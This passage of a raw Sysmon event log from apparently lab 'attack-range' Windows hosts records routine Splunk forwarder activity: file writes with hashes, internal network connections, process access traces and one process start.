Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=430F5C7B2509B58049B3C8CB830C9AA5,SHA256=798E861D2E3EB7C3AEFF1BF19A7B06CA7A6724A8466D7057CBAFF4FE6BB28E6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220292Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:42.868{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5797970F32676539DF180D6A0241546F,SHA256=37E369CB0B48C231CA8CE8861602556DCF3F975EB07B7FE60A406DB2BC6324BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296304Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:42.279{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE8D79A48D7315515AE5C9CA8DF4F43C,SHA256=63A0B6E5C2E17199A6726B166AE575B8F0AD0198DF21DED9B611A827094BEB4D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220294Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:43.899{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DEE541357BC24648712843BE84F6D0A8,SHA256=9652EA45780B68CA38A0279A9540DF9D29B35130977F75D708E39926DCFEF303,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296305Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:43.295{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01ACECC44EF9624EFBD89C2F7E3B841C,SHA256=488372ECCFEFB7D96510BB4CD0DB68D5BF1E20137911855E98DD0EB20206ECAC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220293Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:41.646{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51575-false10.0.1.12-8000- 23542300x8000000000000000220309Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:44.915{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A36BCF9D422DA8DE5503A9DA40092B3E,SHA256=D353E14A4E52BC9E270DCFB794D0789A41DB07DC400569DB38E24F5070ED6A14,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296307Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:42.531{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49331-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000296306Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:44.325{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=560BF6467D1E26FD2BCD90B43EF2DE60,SHA256=7B31528173169FB6874982DDD2621B84669261D860A32316A85EC625A95282A1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000220308Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:44.791{4F8D34B0-1634-6216-E504-000000003902}30684004C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220307Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:44.587{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1634-6216-E504-000000003902}3068C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220306Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:44.587{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220305Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:44.587{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220304Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:44.587{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220303Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:44.587{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220302Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:44.587{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220301Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:44.587{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220300Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:44.587{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220299Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:44.587{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220298Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:44.587{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220297Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:44.587{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1634-6216-E504-000000003902}3068C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000220296Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:44.587{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1634-6216-E504-000000003902}3068C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000220295Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:44.588{4F8D34B0-1634-6216-E504-000000003902}3068C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000220325Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:45.931{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77F2BE73EB2DEFB07170630261F96457,SHA256=8F28B1FD2C50F4AC79AA1AE696D016C0A68ED9C5763271B6B317D2651B7D6274,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296308Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:45.356{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7CDF8782E0B083A64C484EAD4B491910,SHA256=69513E2F8AE5ECD82B562BEA79DAD71E28AB221EFC5498C0EC5387D9347E4AD9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220324Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:45.634{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=79FFA73A2AC4A41111B481DBB2D20D48,SHA256=5E9068973D4BEC779DB894F73DF0541105B5CA5F45B9B3BC0DF9A56B4013A43B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220323Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:45.634{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7F489EED54DFE67B3C63A54A87F1C88F,SHA256=238D7D5CDF7B051AE11B97CF57CF3D202870384D8230A94CAA5338B8ACCAE75A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000220322Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:45.212{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1635-6216-E604-000000003902}996C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220321Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:45.212{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220320Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:45.212{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220319Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:45.212{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220318Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:45.212{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220317Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:45.212{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 